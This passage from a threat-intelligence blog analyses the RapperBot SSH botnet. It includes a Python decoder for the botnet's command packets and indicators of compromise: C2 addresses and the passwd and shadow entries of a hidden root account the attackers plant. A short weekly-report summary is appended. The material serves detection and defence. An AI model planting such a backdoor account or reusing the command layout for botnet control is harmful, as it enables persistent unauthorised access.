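    hdr = struct.calcsize(HEADER_FMT)
    if len(data) < hdr:
        raise ValueError("packet shorter than bot_id + command_code")
    bot_id, code = struct.unpack(HEADER_FMT, data[:hdr])
    msg = {"bot_id": bot_id.hex(), "known_bot": bot_id in KNOWN_BOT_IDS,
           "command": COMMANDS.get(code, f"unknown(0x{code:02x})")}
    if code == 0x00:
        n = struct.calcsize(REG_FMT)
        if len(data) < n:
            raise ValueError("truncated registration packet")
        source = struct.unpack(REG_FMT, data[:n])[2]
        msg["source"] = source.split(b"\0", 1)[0].decode("ascii", "replace")
    elif code == 0x03:
        n = struct.calcsize(ATTACK_FMT)
        if len(data) < n:
            raise ValueError("truncated attack command")
        _, _, vector, port, duration, ip = struct.unpack(ATTACK_FMT, data[:n])
        msg.update(vector=vector, target_port=port, duration=duration,
                   target_ip=str(ipaddress.IPv4Address(ip)))
    return msg


def build_registration(bot_id: bytes, source: str) -> bytes:
    """Constructed sample registration packet, used only to exercise the decoder."""
    return struct.pack(REG_FMT, bot_id, 0x00, source.encode("ascii"))


if __name__ == "__main__":
    print(decode_packet(build_registration(ID_A, "ssh.wget.arm7")))
```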
<p>FortiGuard Labs has been monitoring this threat for over a month. During that time, it has undergone several interesting changes that raise more questions than answers when attempting to pinpoint the primary motivation of the threat actors in launching this campaign. At one point, samples were observed where the DDoS attack capabilities were entirely removed and then added back a week later. Could the DDoS functionality have been retained to masquerade as a typical DDoS botnet and avoid drawing too much attention? It is also possible that this whole campaign is still a work in progress. Additionally, self-propagation was removed after a few days in late June, with the current focus on aggressively retaining continued access to brute-forced SSH servers. Are the threat actors more interested in collecting compromised SSH devices than in expanding their botnet? More importantly, analysts have not seen additional payloads delivered after brute forcing. One can only speculate on why the threat actors are amassing a rapidly growing collection of compromised SSH servers. Over 3,500 unique IPs have been observed in the past 1.5 months attempting to scan and brute-force SSH servers with the SSH-2.0-HELLOWORLD client identification string. IPs from the US, Taiwan, and South Korea comprised half of the observed IPs (Figure 4).</p>
<p><a href="{{#staticFileLink}}10779953662,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}10779953662,RESIZE_400x{{/staticFileLink}}" width="400" alt="10779953662?profile=RESIZE_400x" /></a>Figure 4. Scanner Count from Mid-June to Mid-July 2022</p>
<p>Although this threat heavily borrows code from Mirai, it has features that set it apart from its predecessor and its variants. Its ability to persist in the victim system gives threat actors the flexibility to use compromised devices for any malicious purpose they desire. Due to some significant and curious changes that RapperBot has undergone, its primary motivation is still a bit of a mystery. Regardless, since its primary propagation method is brute forcing SSH credentials, this threat can easily be mitigated by setting strong passwords for devices or by disabling password authentication for SSH (where possible).</p>
<p>Researchers from FortiGuard Labs will continue to monitor RapperBot’s development.</p>
<p>IOCs:</p>
<p><strong>Files</strong></p>
<p><strong>Download URLs</strong></p>
<p><strong>C2</strong></p>
<p>31[.]44[.]185[.]235<br /> 2[.]58[.]149[.]116<br /> 194[.]31[.]98[.]244<br /> 185[.]225[.]73[.]196</p>
<p><strong>Threat Actor SSH public key</strong></p>
<p><strong>Threat Actor root user</strong></p>
<p>/etc/passwd: suhelper:x:0:0::/:</p>
<p>/etc/shadow: suhelper:$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/:19185:0:99999:7:::</p>
<p>We would like to thank the Fortinet researchers for their continued collection and analysis. Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a></p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></li>
</ul>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery/">https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery/</a></p></div>Weekly Cyber Intel Report - All Sector 08 12 2022https://redskyalliance.org/xindustry/weekly-cyber-intel-report-all-sector-08-12-20222022-08-12T12:52:11.000Z2022-08-12T12:52:11.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><a href="{{#staticFileLink}}10764228452,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10764228452,RESIZE_400x{{/staticFileLink}}" alt="10764228452?profile=RESIZE_400x" width="200" /></a><span style="font-size:12pt;">Activity Summary - Week Ending on 12 August 2022</span>:</h2>
<ul>
<li>Red Sky Alliance identified 23,968 connections from new IPs checking in with our Sinkholes</li>
<li>ril.com Hit</li>
<li>Analysts identified 765 new IP addresses participating in various Botnets</li>
<li>Zeppelin Ransomware</li>
<li>Exim</li>
<li>SmokeLoader</li>
<li>RapperBot</li>
<li>AiTM Phishing</li>
<li>BlenderBot</li>
<li>PortDoor & CotSam</li>
</ul>
<p>Link to full report: <a href="{{#staticFileLink}}10764227096,original{{/staticFileLink}}">IR-22-224-001_weekly224.pdf</a></p></div>